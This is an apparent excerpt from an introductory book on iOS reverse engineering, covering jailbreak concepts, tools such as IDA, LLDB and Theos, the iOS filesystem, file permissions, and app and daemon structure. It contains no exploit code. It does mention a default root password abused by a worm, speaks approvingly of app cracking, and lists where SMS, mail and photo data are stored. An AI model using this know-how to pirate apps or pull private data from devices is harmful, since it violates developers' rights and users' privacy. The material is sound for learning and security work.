•  Senior iOS developers, who have good command of App development and have the desire to 
understand iOS better. 
•  Architects. During the process of reverse engineering, they can learn architectures of those excellent 
Apps so that they can improve their ability of architecture design.  
•  Reverse engineers in other systems who’re also interested in iOS. 
How to read this book?  
There are four parts in this book. They are concepts, tools, theories and practices, 
respectively. The first three parts will introduce the background, knowledge and its associated 
tools as well as theories. The fourth part consists o f four examples so that readers will have a 
deeper understanding of previous knowledge in a practical way.  
If the reader doesn ’t have any experience in iOS reverse engineering, we recommend you to 
start from the first part rather than jumping to the fourth part directly. Although practices  are 
visually cool, hacking is tasteless if you don ’t know how everything is working under the hood.  
Errata and Support  
Due to our limited skills and writing schedule, it is inevitable that there are some errors  or 
inaccuracies in the book. We plea for your correction and criticism. Also, readers can visit our official forum (http://bbs.iosre.com) and you will find iOS reverse engineers all over the world 
on it. Your questions will definitely get satisfied answer s. 
 
10 Because all authors, translators and the editor (snakeninny himself) are not native English 
speakers, this book may be linguistically ugly. But we promise that this book is techinically 
pretty. So if you think anything needs to be reworded, please get t o us. Thank you!  
Acknowledgements  
In the first place, I want to say thank you to evad3rs , PanguTeam , TaiG, saurik a nd other 
top teams and experts. 
Also thanks to Dustin Howett. His Theos is a powerful tool that helped me to step into iOS 
reverse engineering.  
Thanks to Security Manager for providing me with a nice atmosphere for studying reverse 
engineering. Although I have left this company, I do wish it a better future .  
Thanks to everyone who offers help  to me. Thanks for your support and encour agement.  
This book is dedicated to my dearest family, and many friends who love iOS development.  
 
Hangcom  
  
 
11  
 
 
It’s more fun to be a pirate than to join the Navy.  
-  Steve Jobs 
 
    
Some of us like to play it safe and take each day as it 
comes.  Some of us want to take that crazy walk on the wild 
side. So... For those of us who like living dangerously, this one ’s 
for you.  
-  Michael Jackson  
 
  
12  
Concepts 
 
 
Software reverse engineering refers to the process of deducing the implementation  and 
design details of a program or a system by analyzing the functions, structures or behaviors of it. 
When we are very interested in a certain software feature while not having the access to the 
source code, we can try to analyze it by reverse engineerin g. 
For iOS developers, Apps on iOS are one of the most complex but fantastic virtual items as 
far as we know. They are elaborate, meticulous and creative. As developers, when you see an 
exquisite App, not only will you be amazed by its implementation, but also you will be curious 
about what kind of techniques are used in this App and what we can learn from it.  
 
 
I 
  
 
13  
Introduction to iOS reverse engineering  
 
 
Although the recipe of Coca -Cola is highly confidential, some other companies can still 
copy its taste. Although we don ’t have access to the source code of others’  Apps, we can dig into 
their details by reverse engineering.  
1.1  Prerequisite s of iOS reverse engineering 
iOS reverse engineering refers to the process of reverse analysis at software -level. If you 
want to have strong skills on iOS reverse engineering, you ’d better be familiar with the 
hardware constitution of iOS and how iOS works. Also, you shoul d have rich experiences in 
developing iOS Apps. If you can infer the project scale of an App after using it for a while, its 
related technologies, its MVC pattern, and which open source projects or frameworks it 
references, you can announce that you have a  good ability on reverse engineering.  
Sounds demanding? Aha, a bit. However, all above prerequisites are not fully necessary. As 
long as you can keep a strong curiosity and perseverance in iOS reverse engineering, you can 
also become a good iOS reverse eng ineer. The reason is that during the process of reverse 
engineering, your curiosity will drive you to study those classical Apps. And it is inevitable that 
you will encounter some problems that you can ’t fix immediately. As a result, it takes your 
perseverance to support you to overcome the difficulties one by one. Trust me, you will surely get your ability improved and feel the beauty of reverse engineering after putting lots of efforts 
on programming, debug ging and analyzing the logic of software.  
1.2   What does iOS reverse engineering do  
Metaphorically speaking, we can regard iOS reverse engineering as a spear, which can break 
the seemingly safe protection of Apps. It is interesting and ridiculous to note that m any 
companies that develop Apps are not aware of the existence of this spear and think their Apps 
are unbreakable.  
1 
  
 
14 For IM Apps like WeChat or WhatsApp, the core of this kind of Apps is the information 
they exchange. For software of banks , payment or e -comm erce, the core is the monetary 
transaction data and customer information. All these core data have to be securely protected. So 
developers have to protect their Apps by combining anti -debugging, data encryption and code 
obfuscation together. The aim is to increase the difficulty of reverse engineering and prevent 
similar security issues from affecting user experience.  
However, the technologies currently being used to protect Apps are not in the same 
dimension with those being used in iOS reverse engineering. For general App protections, they 
look like fortified castles. By applying the MVC architecture of Apps inside the castle with thick 
walls outside, we may feel that they are insurmountable, as shown in figure 1 -1. 
  
Figure 1- 1 Strong fortress, taken from  Assassin ’s Creed 
But if we step onto another higher dimension and overlook into the castle where the App 
resides, you find that structure inside the castle is no longer a secret, as shown in figure 1 -2. 

 
15   
Figure 1- 2 Overlook the castle, taken from Assassin ’s Creed 
All Objective -C interfaces, all properties, all exported functions, all global variables, even all 
logics  are exposed in front of us, which means all protections have became useless. So if we are 
in this dimension, walls are no longer hind rances. What we should focus on is how can we find 
our targets inside the huge castle.  
At this point, by using reverse engineering techniques, you can enter the low dimension 
castle from any high dimension places without damaging walls of the castle, which  is definitely 
tricky while not laborious. By monitoring and even changing the logic s of Apps, you can learn 
the core information and design details easily.  
Sounds very incredible? But this is true. According to the experiences and achievements I ’ve 
got fr om the study of iOS reverse engineering, I can say that reverse engineering can break the 
protection of most Apps, all their implementation and design details can be completely exposed.  
The metaphor above is only my personal viewpoint. However, it vividly illustrates how 
powerful iOS reverse engineering is. In a nutshell, there are two major functions in iOS reverse 
engineering as below:  
•  Analyze the target App and get the core information. This can be concluded as security related 
reverse engineering. 
•  Learn from other Apps’ features and then make use of them in our own Apps. This can be concluded as development related reverse engineering.  

 
16 1.2.1    Security related iOS reverse engineering  
Security related IT industry would generally make extensive use of reverse engineering. For 
example, reverse engineering plays the key roles in evaluating the security level of a financial 
App, finding solutions of killing viruses, and setting up a spam phone call firewall on iOS, etc.  
1.   Evaluate security level 
Apps which c onsist of sensitive features like financial transactions will encrypt the data at 
first and then save the encrypted data locally or transfer them via network. If developers do not have strong awareness of security, it is very possible for them to save or s end the sensitive 
information such as bank accounts and passwords without encryption, which is definitely a 
great security risk. 
If a company with high reputation wants to release an App. In order to make the App 
qualified with the reputation as well as th e trust from customers, the company will hire a 
security organization to evaluate this App before releasing it. In most cases, the security organization does not have access to the source code so that they cannot evaluate the security 
level via code review . Therefore the only way they can do is reverse engineering. They try to 
attack the App and then evaluate the security level based on the result.  
2.   Reverse engineering malware 
iOS is the operating system of smart devices, it has no essential difference with computer 
operating systems. From the first generation, iOS is capable of browsing the Internet. However, 
the Internet is the best medium of malware. Ikee, exposed in 2009, is  the first virus in iOS. It can 
infect those jailbroken iOS devices which have installed ssh but have not changed the default password “alpine ”. It can change the background image of the lockscreen to photo of a British 
singer. Another virus WireLurker app eared at the end of 2014, it can steal private information of 
users and spread on PC or Mac, bringing users disastrous harm.  
For malware developers, by targeting system and software vulnerabilities through reverse 
engineering, they can penetrate into the t arget hosts, access to sensitive data and do whatever 
they want. 
 
17 For anti- virus software developers, they can analyze samples of viruses through reverse 
engineering, observe the behaviors of viruses and then try to kill them in the infected hosts as 
well a s summarize the methods to protect against viruses.  
3.   Detect software backdoors 
A big advantage of open source software is its good security. Tens of thousands of 
developers review the code and modify the bug of open source software. As a result, the 
possibi lities that there are backdoors inside the code are minimized, and the security related 
bugs would be fixed before they are disclosed. For closed source software, reverse engineering is one of the most frequently used methods to detect the backdoors in sof tware. For example, we 
often install different kinds of Apps on jailbroken iPhones through third -party App Stores. All 
these Apps are not officially examined and reviewed by Apple so there could be unrevealed 
risks. Even worse, some developers will put bac kdoors inside their Apps on the purpose of 
stealing something from users. So reverse engineering is often involved in the process of detecting that kind of behaviors.  
4.   Remove software restriction 
Selling Apps on AppStore or Cydia is one primary economic sou rce for App developers. In 
the software world, piracy and anti -piracy will coexist forever. Many developers have already 
added protection in their software to prevent piracy. However, just like the war between spear 
and shield will never stop, no matter ho w good the protection of an App is, there will definitely 
be one day that the App is cracked. The endless emergency of pirated software makes it an impossible task for developers to prevent piracy. For example, the most famous share repository 
“xsellize ” on Cydia is able to crack any App in just one day and it is notorious among the 
industry. 
1.2.2    Development related iOS reverse engineering  
For iOS developers, reverse engineering is one of the most practical techniques. For 
example, we can do reverse engineering  on system APIs to use some private functions, which 
are not documented. Also, we can learn good architecture and design from those classical Apps 
through reverse engineering.  
 
18 1.   Reverse System APIs 
The reason that Apps are able to run in the operating system  and to provide users with a 
variety of functions is that these functions are already embedded in the operating system itself, 
what developers need to do is just reassembling them. As we all know, functions we used for 
developing Apps on AppStore are restricted by Apple ’s document and are under the strict 
regulation of Apple. For example, you cannot use undocumented functions like making phone calls or sending messages. However, if you ’re targeting Cydia Store, absence of private functions 
makes your App mu ch less competitive. If you want to use undocumented functions, the most 
effective reference is from reversing iOS system APIs, then you can recreate the code of 
corresponding functions and apply it to your own Apps.  
2.   Learn from other Apps 
The most popular scenario for reverse engineering is to learn from other Apps. For most 
Apps on AppStore, the implementations of them are not very difficult, their ingenious ideas and 
good business operation are the keys to success. So, if you just want to learn a function  from 
another App, it is time -consuming and laborious to restore the code through reverse 
engineering; I ’d suggest you write a similar App from scratch. However, reverse engineering 
plays a critical role in the situation when we don ’t know how a feature of  an App is 
implemented. This is often seen in Cydia Apps with extensive use of private functions. For 
example, Audio Recorder, known as the first phone call recording App, is a closed source App. 
Yet it is very interesting for us to learn how it is impleme nted. Under this circumstance you can 
learn a little bit through iOS reverse engineering.  
There are some classical Apps with neat code, reasonable architecture, and elegant 
implementation. Compared with developers of those Apps, we don ’t have profound tech nical 
background. So if we want to learn from those Apps while not having an idea of where to start, 
we can turn to reverse engineering. Through reverse engineering those Apps, we can extract the 
architecture design and apply it to our own projects so that  we can enhance our Apps. For 
example, the stability and robustness of WhatsApp is so excellent that if we want to develop our own IM Apps, we can benefit a lot from learning the architecture and design of WhatsApp.  
 
19 1.3   The process of iOS reverse engineering  
When we want to reverse an App, how should we think? Where should we start? The 
purpose of this book is to guide the beginners into the field of iOS reverse engineering, and 
cultivate readers to think like reversers.  
Generally speaking, reverse engineering can be regarded as a combination of analysis on 
two stages, which are system analysis and code analysis, respectively. In the phase of system 
analysis, we can find our targets by observing behavioral characteristics of program and 
organizations of files. D uring code analysis, we need to restore the core code and then 
ultimately achieve our goals.  
1.3.1    System Analysis  
At the stage of system analysis, we should run target Apps under different conditions, 
perform various operations, observe the behavioral characteristics and find out features that we 
are interested in, such as which option we choose leads to a popup alert? Which button makes a 
sound after pressing it? What is the output associated with our input, etc. Also, we can browse 
the filesystem, see the displayed images, find the configuration files ’ locations, inspect the 
information stored in databases and check whether the information is encrypted.  
Take Sina Weibo as an example. When we look over its Documents folder, we can find 
some databases:  
-rw-r--r-- 1 mobile mobile  210944 Oct 26 11:34 db_46100_1001482703473.dat  
-rw-r--r-- 1 mobile mobile  106496 Nov 16 15:31 db_46500_1001607406324.dat  
-rw-r--r-- 1 mobile mobile  630784 Nov 28 00:43 db_46500_3414827754.dat  
-rw-r--r-- 1 mobile mobile 6078464 Dec  6 12:09 db_46600_1172536511.dat  
...... 
Open them with SQLite tools, we can find some followers ’ information in it, as shown in 
figure 1 -3. 
 
20   
Figure 1- 3 Sina Weibo database  
Such information provides us with clues for reverse engineering. Database file names, Sina 
Weibo user IDs, URLs of user information, all can be used as cut -in points for reverse 
engineering. Find ing and organiz ing these clues, then track ing down to what we are interested 
in, is often the first step of iOS reverse engineering.  
1.3.2    Code Analysis 
After system analysis, we should do code analysis on the App binary.  Through reverse 
engineering, we can deduce the design pattern, internal algorithms, and the implementation 
details of an App. However, this is a very complex process and can be reg arded as an art of 
deconstruction and reconstruction. To improve your reverse engineering skill level into the 
state of art, you must have a thorough understanding on software development, hardware 
principles, and iOS itself. Analyzing the low -level instru ctions bit by bit is not easy and cannot be 
fully covered in one single book.  
The purpose of this book is just to introduce tools and methodologies of reverse 
engineering to beginners. Technologies are evolving constantly, so we cannot cover all of them. For this reason, I ’ve build up a forum, http://bbs.iosre.com , where we can discuss and exchange 
ideas with each other in real time.  
1.4   Tools for iOS reverse engineering  
After learning some concepts  about iOS reverse enginee ring, it is time for us to put theory 
into practice with some useful tools. Compare with App development, tools used in reverse 
engineering are not as “smart”  as those in App development. Most tasks have to be done 
manually, so being proficient with tools can greatly improve the efficiency of reverse 

 
21 engineering. Tools can be divided into 4 major categories; they are monitors, disassemblers, 
debuggers and development kit.  
1.4.1   Monitors  
In the field of iOS reverse engineering, tools used for sniffing, monitoring and recording 
targets ’ behaviors can all be concluded as monitors. These tools generally record and display 
certain operations performed by the target programs, such as UI changes, network activities and 
file accesses. Reveal, snoop -it, introspy , etc., are frequently used monitors.  
Reveal, as shown in figure 1 -4, is a tool to see the view hierarchy of an App in real -time. 
  
Figure 1-  4 Reveal 
Reveal can assist us in locating what we are interested in an App so that we can quickly 
approach the code from the UI.  
1.4.2    Disassemblers 
After approaching the code from the UI, we have to use disassembler to sort out the code. 
Disassemblers take binaries as input, and output assembly code after processing the files. IDA 
and Hopper are two major disassemblers in iOS reverse engineering.  
As an evergreen disassembler, IDA is one of the most commonly used tools in reverse 
engineering. It supports Windows, Linux and OSX, as well as multiple processor architectures, 
as shown in figure 1 -5. 

 
22   
Figure 1-  5 IDA  
Hopper i s a disassembler that came out in recent years, which mainly targets Apple family 
operating systems, as shown in figure 1 -6. 
  
Figure 1-  6 Hopper  
After disassembling binaries, we have to read the generated assembly code. This is the most 
challenging task a s well as the most interesting part in iOS reverse engineering, which will be 
explained in detail in chapters 6 to 10. We will use IDA as the main disassembler in this book 
and you can reference the experience of Hopper on http://bbs.iosre.com.  

 
23 1.4.3    Debuggers  
iOS developers should be familiar with debuggers because we often need to debug our own 
code in Xcode. We can set a breakpoint on a line of code so that process will stop at that line and 
display the current status of the process in real time. We constantly  use LLDB for debugging 
during both App development and reverse engineering. Figure 1- 7 is an example of debugging in 
LLDB.  
 
Figure 1-  7 LLDB 
1.4.4    Development kit  
After finishing all the above steps, we can get results from analysis and start to code for 
now. For App developers, Xcode is the most frequently used development tool. However, if we 
transfer the battlefield from AppStore to jailbroken iOS, our development kit gets expanded. 
Not only is there an Xcode based iOSOpenDev, but also a command line based T heos. Judging 
from my own experiences, Theos is the most exciting development tool. Before knowing Theos, I felt like I was restricted to the AppStore. Not until I mastered the usage of Theos did I 
break the restriction of AppStore and completely understoo d the real iOS. Theos is the major 
development tool in this book and we ’ll discuss about iOSOpenDev on our website.  
1.5    Conclusion 
In this chapter, we have introduced some concepts about iOS reverse engineering in order 
to provide readers with a general idea of what we ’ll be focusing on. More details and examples 
will be covered in the following chapters. Stay tuned with us!  
  

24  
Introduction to jailbroken iOS  
 
 
Compared with what we see on Apps ’ UI, we are more interested in their low -level 
implementation, which is exactly the motivation of reverse engineering. But as we know, non -
jailbroken iOS is a closed blackbox, it has not been exposed to the public until dev teams like 
evad3rs, PanguTeam an d TaiG  jailbroke it, then we ’re able to take a peek under the hood.  
2.1   iOS System Hierarchy  
For non- jailbroken iOS, Apple provides very few APIs in the SDK to directly access the 
filesystem. By refering to the documents, App Store developers may have no idea of iOS system 
hierarchy at all.  
Because of very limited permission, App Store Apps (here after referred to as StoreApps) 
cannot access most directories apart from their own. However, for jailbroken iOS, Cydia Apps 
can possess higher permission than StoreApps, which enables them to access the whole 
filesystem. For example, iFile from Cydia is a  famous third -party file management App, as 
shown in figure 2 -1. 
2 
  
 
25  
Figure 2-  1 iFile 
With the help of AFC2, we can also access the whole iOS filesystem via software like 
iFunBox on PC, as shown in figure 2 -2. 
 
Figure 2-  2 iFunBox 
Because our reverse engineering targets come right from iOS, being able to access the 
whole iOS filesystem is the prerequisite of our work.  

 
26 2.1.1   iOS filesystem  
iOS comes from OSX, which is based on UNIX. Although there are huge differences among 
them,they are somehow related to each other. We can get some knowledge of iOS filesystem 
from Filesystem Hierarchy Standard and hier(7).  
Filesystem Hierarchy Standard (hereafter referred to as FHS) provides a standard for all 
*NIX filesystems. The intention of FHS is to make the location o f files and directories 
predictable for users. Evolving from FHS, OSX has its own standard, called hier(7). Common 
*NIX filesystem is as follows.  
•  / 
Root directory. All other files and directories expand from here.  
•  /bin 
Short for “ binary” . Binaries that provide basic user -level functions, like ls and ps are stored 
here.  
•  /boot 
Stores all necessary files for booting up. This directory is empty on iOS.  
•  /dev 
Short for “ device” , stores BSD device files. Each file represents a block device or a character 
device. In general, block devices transfer data in block, while character devices transfer data in 
character.  
•  /sbin 
Short for “ system binaries” . Binaries that provide basic system- level functions, like netstat 
and reboot are stored here.  
•  /etc 
Short for “ Et Cetera” . This directory stores system scripts and configuration files like 
passwd and hosts. On iOS, this is a symbolic link to /private/etc.  
•  /lib 
This directory stores system- level lib files, kernel files and device drivers. This directory is 
empty on iO S.   
 
27 •  /mnt 
Short for “ mount ”, stores temporarily mounted filesystems. On iOS, this directory is empty.  
•  /private 
Only contains 2 subdirectories, i.e. /private/etc and /private/var.  
•  /tmp 
Temporary directory. On iOS, this directory is a symbolic link to /pri vate/var/tmp.  
•  /usr 
A directory containing most user -level tools and programs. /usr/bin is used for other basic 
functions which are not provided in /bin or /sbin, like nm and killall. /usr/include contains all 
standard C headers, and /usr/lib stores lib fi les. 
•  /var 
Short for “ variable ”, stores files that frequently change, such as log files, user data and 
temporary files.  /var/mobile/ is for mobile user and /var/root/ is for root user, these 2 
subdirectories are our main focus.  
Most directories listed above are rather low -level that they ’re difficult to reverse engineer. 
As beginners, it ’s better for us to start with something much easier. As App developers, most of 
our daily work is dealing with iOS specific directories. Reverse engineering becomes more 
approachable when it comes to these familiar directories:  
•  /Applications 
Directory for all system Apps and Cydia Apps, excluding StoreApps, as shown in figure 2 -3. 
 
28  
Figure 2-  3 /Applications  
•  /Developer 
If you connect your device with Xcode and can see it  in “Devices”  category like figure 2 -4 
shows, a “/Developer ” directory will be created automatically on device, as shown in figure 2 -5. 
Inside this directory, there are some data files and tools for debugging.  

 
29  
Figure 2-  4 Enable debugging on device  
 
Figure 2-  5 /Developer 
•  /Library 
This directory contains some system -supported data as shown in figure 2 -6. One 
subdirectory of it named MobileSubstrate is where all CydiaSubstrate (formerly known as 
MobileSubstrate) based tweaks are.  

 
30  
Figure 2-  6 /Library  
•  /System/Library 
One of the most important directories on iOS, stores lots of system components, as shown 
in figure 2- 7. 
 
Figure2-  7 /System/Library  
Under this directory, we beginners should mainly focus on these subdirectories:  

 
31 2  /System/Library/Frameworks and /System/Library/PrivateFrameworks 
Stores most iOS frameworks. Documented APIs are only a tiny part of them, while 
countless private APIs are hidden in those frameworks.    
2  /System/Library/CoreServices/SpringBoard.app 
iOS’ graphical user interface, as is explorer to Windows. It is the most important 
intermediate between users and iOS.  
More directories under “/System ” deserve our attention. For more advanced contents, 
please visit http://bbs.iosre.com . 
•  /User 
User directory, it ’s a symbolic link to /var/mobile, as shown in figure 2 -8.  
 
Figure 2-  8 /User  
This directory contains large numbers of user data, such as:  
2  Photos are stored in /var/mobile/Media/DCIM; 
2  Recording files are stored in /var/mobile/Media/Recording s; 
2  SMS/iMessage databases are stored in /var/mobile/Library/SMS;  
2  Email data is stored in /var/mobile/Library/Mail.  

 
32 Another major subdirectory is /var/mobile/Containers, which holds StoreApps. 
It is noteworthy that bundles containing Apps ’ executables resid e in 
/var/mobile/Containers/Bundle, while Apps’  data files reside in 
/var/mobile/Containers/Data, as shown in figure 2 -9.  
 
Figure 2-  9 /var/mobile/Containers  
It’s helpful to have a preliminary knowledge of iOS filesystem when we discover some 
interesting  functions and want to further locate their origins. What we ’ve introduced above is 
only a small part of iOS filesystem. For more details, please visit http://bbs.iosre.com , or just 
type “man hier ” in OSX terminal.  
2.1.2   iOS file permission 
iOS is a multi -user system. “user” is an abstract concept, it means the ownership and 
accessibility in system. For example, while root user can call “reboot ” command to reboot iOS, 
mobile user cannot. “group”  is a way to organize users. One  group can contain more than one 
user, and one user can belong to more than one group.  
Every file on iOS belongs to a user and a group, or to say, this user and this group own this 
file. And each file has its own permission, indicating what operations can  the owner, the (owner) 
group and others perform on this file. iOS uses 3 bits to represent a file ’s permission, which are r 
(read), w (write) and x (execute) respectively. There are 3 possible relationships between a user 
and a file:  

 
33 •  This user is the owner of this file. 
•  This user is not the owner of this file, but he is a member of the (owner) group.  
•  This user is neither the owner nor a member of the (owner) group.  
So we need 3 * 3 bits to represent a file ’s permission in all situations. If a bit is set to 1, it 
means the corresponding permission is granted. For instance, 111101101 represents rwxr -xr-x, in 
other words, the owner has r, w and x permission, but the (owner) group and other users only 
have r and x permission. Binary number 111101101 equals to  octal number 755, which is another 
common representation form of permission.  
Actually, besides r, w, x permission, there are 3 more special permission, i.e. SUID, SGID 
and sticky. They are not used in most cases, so they don ’t take extra permission bits,  but instead 
reside in x permission ’s bit. As beginners, there are slim chances that we will have to deal with 
these special permission, so don ’t worry if you don ’t fully understand this. For those of you who 
are interested, http://thegeekdiary.com/what -is-suid-sgid- and- sticky- bit/ is good to read.  
2.2   iOS file types  
Rookie reverse engineers ’ main targets are Application, Dynamic Library (hereafter referred 
to as dylib) and Daemon binarie s. The more we know them, the smoother our reverse 
engineering will be. These 3 kinds of binaries play different roles on iOS, hence have different 
file hierarchies and permission.  
2.2.1   Application  
Application, namely App, is our most familiar iOS component. A lthough most iOS 
developers deal with Apps everyday, our main focus on App is different in iOS reverse 
engineering. Knowing the following concepts is a prerequisite for reverse engineering.  
1.   bundle 
The concept of bundle originates from NeXTSETP. Bundle is indeed not a single file but a 
well-organized directory conforming to some standards. It contains the executable binary and all 
running necessities. Apps and frameworks are packed as bundles. PreferenceBundles (as shown in figure 2- 10), which are common in  jailbroken iOS, can be seen as a kind of Settings dependent 
App, which is also a bundle.  
 
34  
Figure 2-  10 PreferenceBundle  
Frameworks are bundles too, but they contain dylibs instead of executables. Relatively 
speaking, frameworks are more important than Apps, because most parts of an App work by 
calling APIs in frameworks. When you target a bundle in reverse engineering, most  of the work 
can be done inside the bundle, saving you significant time and energy.  
2.   App directory hierarchy  
Being familiar with App ’s directory hierarchy is a key factor of our reverse engineering 
efficiency. There are 3 important components in an App ’s directory:  
•  Info.plist 
Info.plist records an App ’s basic information, such as its bundle identifier, executable name, 
icon file name and so forth. Among these, bundle identifier is the key configuration value of a tweak, which will be discussed later in CydiaSubstrate section. We can look up the bundle 
identifier in Info.plist with Xcode, as shown in figure 2 -11. 
 

35 Figure 2-  11 Browse Info.plist in Xcode  
Or use a command line tool, plutil, to view its value.  
snakeninnysiMac:~ snakeninny$ plutil -p 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/SiriViewService.app/Info.plist | 
grep CFBundleIdentifier  
  "CFBundleIdentifier" => "com.apple.SiriViewService"  
In this book, we mainly use plutil to browse plist files.  
•  Executable 
Executable is the core of an App, as well our ultimate reverse engineering target, without 
doubt. We can locate the executable of an App with Xcode, as shown in figure 2 -12.  
 
Figure 2-  12 Browse Info.plist in Xcode  
Or with plutil:  
snakeninnysiMac:~ snakeninny$ plutil - p 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/SiriViewService.app/Info.plist | 
grep CFBundleExecutable  
  "CFBundleExecutable" => "SiriViewService"  
•  lproj directories 
Localized strings are saved in lproj directories. They are important clues of iOS reverse 
engineering. plutil tool can also parse those .string files.  
snakeninnysiMac:~ snakeninny$ plutil -p 
/Users/snakeninny/Code/iOSSystemBinaries/8.1_iPhone5/SiriViewSer vice.app/en.lproj/Locali
zable.strings  
{ 
  "ASSISTANT_INITIAL_QUERY_IPAD" => "What can I help you with?"  
  "ASSISTANT_BOREALIS_EDUCATION_SUBHEADER_IPAD" => "Just say “Hey Siri” to learn more."  
  "ASSISTANT_FIRST_UNLOCK_SUBTITLE_FORMAT" =>  "Your passcode is required when %@ 
restarts"  
...... 
You will see how we make use of .strings in reverse engineering in chapter 5.  

 
36 3.   System App VS. StoreApp 
/Applications contains system Apps and Cydia Apps (We treat Cydia Apps as system Apps), 
and /var/mobile/Containers/Bundle/Application is where StoreApps reside. Although all of 
them are categorized as Apps, they are different in some ways:  
•  Directory hierarchy  
Both system Apps and StoreApps share the similar bundle hierarchy, including Info.plist 
files, executables and lproj directories, etc. But the path of their data directory is different, for 
StoreApps, their data directories are under /var/mobile/Cont ainers/Data, while for system 
Apps running as mobile, their data directories are under /var/mobile; for system Apps running as root, their data directories are under /var/root.  
•  Installation package and permission 
In most cases, Cydia Apps ’ installation packages are .deb formatted while StoreApps ’ are .ipa 
formatted. .deb files come from Debian, and are later ported to iOS. Cydia Apps ’ owner and 
(owner) group are usually root and admin, which enables them to run as root. .ipa is the official  
App format, whose owner and (owner) group are both mobile, which means they can only run 
as mobile.  
•  Sandbox 
Broadly speaking, sandbox is a kind of access restriction mechanism, we can see it as a form 
of permission. Entitlements are also a part of sandbox . Sandbox is one of the core components 
of iOS security, which possesses a rather complicated implementation, and we’ re not going to 
discuss it in details. Generally, sandbox restricts an App’ s file access scope inside the App itself. 
Most of the time, an App has no idea of the existence of other Apps, not to mention accessing 
them. What ’s more, sandbox restricts an App ’s function. For example, an App has to ask for 
sandbox’ s permission to take iCloud related operations.  
Sandbox is not suitable to be begin ners’  target, it’ d be enough for us to know its existence. 
In iOS reverse engineering, jailbreak has already removed most security protections of iOS, and 
reduced sandbox ’s constraints in some degree, so we are likely to ignore the existence of 
sandbox, he nce leading to some strange phenomena such as a tweak cannot write to a file, or 
calls a function but it ’s not functioning as expected. If you can make sure your code is 100% 
correct, then you should recheck if the problem is because of your misunderstandi ng of tweak ’s 
 
37 permission or sandbox issues. Concepts about Apps cannot be fully described in this book, so if 
you have any questions, feel free to raise it on http://bbs.iosre.com . 
2.2.2   Dynamic Library  
Most of our developers ’ daily work is writing Apps, and I guess just a few of you have ever 
written dylibs, so the concept of dylib is strange to most of you. In fact, you ’re dealing with 
dylibs a lot: the frameworks and lib files we import in Xcode are all dylibs. We can verif y this 
with ‘file’ command:  
snakeninnysiMac:~ snakeninny$ file 
/Users/snakeninny/Code/iOSSystemBinaries/8.1.1_iPhone5/System/Library/Frameworks/UIKit.f
ramework/UIKit  
/Users/snakeninny/Code/iOSSystemBinaries/8.1.1_iPhone5/System/Library/Frameworks/UIKit.f
ramework/UIKit: Mach -O dynamically linked shared library arm  
If we shift our attention to jailbroken iOS, all the tweaks in Cydia work as dylibs. It is those 
tweaks ’ existence that makes it possible for us to customize our iPhones. In reverse engineering, 
we’ll be dealing with all kinds of dylibs a lot, so it ’d be good for us to know some basic concepts.  
On iOS, libs are divided into two types, i.e. static and dynami c. Static libs will be integrated 
into an App’ s executable during compilation, therefore increases the App ’s size. Now that we 
have a bigger executable, iOS needs to load more data into memory during App launching, so 
the result is that, not surprisingly, App’s launch time increased, too. Dylibs are relatively 
“smart” , it doesn ’t affect executable ’s size, and iOS will load a dylib into memory only when an 
App needs it right away, then the dylib becomes part of the App.  
It’s worth mentioning that, although d ylibs exist everywhere on iOS, and they are the main 
targets of reverse engineering, they are not executables. They cannot run individually, but only 
serve other processes. In other words, they live in and become a part of other processes. Thus, 
dylibs’  permission depends on the processes they live in, the same dylib ’s permission is different 
when it lives in a system App or a StoreApp. For instance, suppose you write an Instagram tweak to save your favorite pictures locally, if the destination path is this  App’s documents 
directory under /var/mobile/Containers/Data, there won ’t be a problem because Instagram is 
a StoreApp, it can write to its own documents. But if the destination path is 
/var/mobile/Documents, then when you save pictures happily and want to  review them 
wistfully, you ’ll find nothing under /var/mobile/Documents. All the tweak operations are 
banned by sandbox.  
 
38 2.2.3   Daemon  
Since your first day doing iOS development, Apple has been telling you “There is no real 
backgrounding on iOS and your App can only operate with strict limitations. ” If you are a pure 
App Store developer, following Apple ’s rules and announcements can make the review process 
much easier! However, since you ’re reading this book , you likely want to learn reverse 
engineering and this means straying into undocumented territory. Stay calm and follow me:  
•  When I’m browsing reddit or reading tweets on my iPhone, suddenly a phone call comes in. All 
operations are interrupted immediately, and iOS presents the call to me. If there is no real backgrounding on iOS, how can iOS handle this call in real time?  
•  For those who receive spam iMessages a lot, firewalls like SMSNinja are saviors. If a firewall fails to stay in the background, how could it filter every single iMessages instantaneously?  
•  Backgrounder is a famous tweak on iOS 5. With the help of this tweak, we can enable real 
backgrounding for Apps! Thanks to this tweak, we don ’t have to worry about missing WhatsApp 
messages because of unreliable push notifications any more. If there is no re al backgrounding, how 
could Backgrounder even exist? 
All these phenomena indicate that real backgrounding does exist on iOS. Does that mean 
Apple lied to us? I don ’t think so. For a StoreApp, when user presses the home button, this App 
enters background, most functions will be paused. In other words, for App Store developers, 
you’ d better view iOS as a system without real backgrounding, because the only thing Apple 
allows you to do doesn ’t support real backgrounding. But iOS originates from OSX, and like a ll 
*NIX systems, OSX has daemons (The same thing is called service on Windows). Jailbreak opens 
the whole iOS to us, thus reveals all daemons.  
Daemons are born to run in the background, providing all kinds of services. For example, 
imagent guarantees the c orrect sending and receiving of iMessages, mediaserverd handles 
almost all audios and videos, and syslogd is used to record system logs. Each daemon consists of 
two parts, one executable and one plist file. The root process on iOS is launchd, which is also  a 
daemon, checks all plist files under /System/Library/LaunchDaemons and /Library/LaunchDaemons after each reboot, then run the corresponding executable to launch 
the daemon. A daemons ’ plist file plays a similar role as an App ’s Info.plist file, it recor ds the 
daemon’ s basic information, as shown in the following:  
snakeninnys -MacBook:~ snakeninny$ plutil -p 
/Users/snakeninny/Code/iOSSystemBinaries/8.1.1_iPhone5/System/Library/LaunchDaemons/com.
apple.imagent.plist  
 
39 { 
  "WorkingDirectory" => "/tmp"  
  "Label" => "com.apple.imagent"  
  "JetsamProperties" => {  
    "JetsamMemoryLimit" => 3000  
  } 
  "EnvironmentVariables" => {  
    "NSRunningFromLaunchd" => "1"  
  } 
  "POSIXSpawnType" => "Interactive"  
  "MachServices" => {  
    "com.apple.hsa -authentication -server" => 1  
    "com.apple.imagent.embedded.auth" => 1  
    "com.apple.incoming -call-filter-server" => 1  
  } 
  "UserName" => "mobile"  
  "RunAtLoad" => 1  
  "ProgramArguments" => [  
    0 => "/System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent"  
  ] 
  "KeepAlive" => {  
    "SuccessfulExit" => 0  
  } 
} 
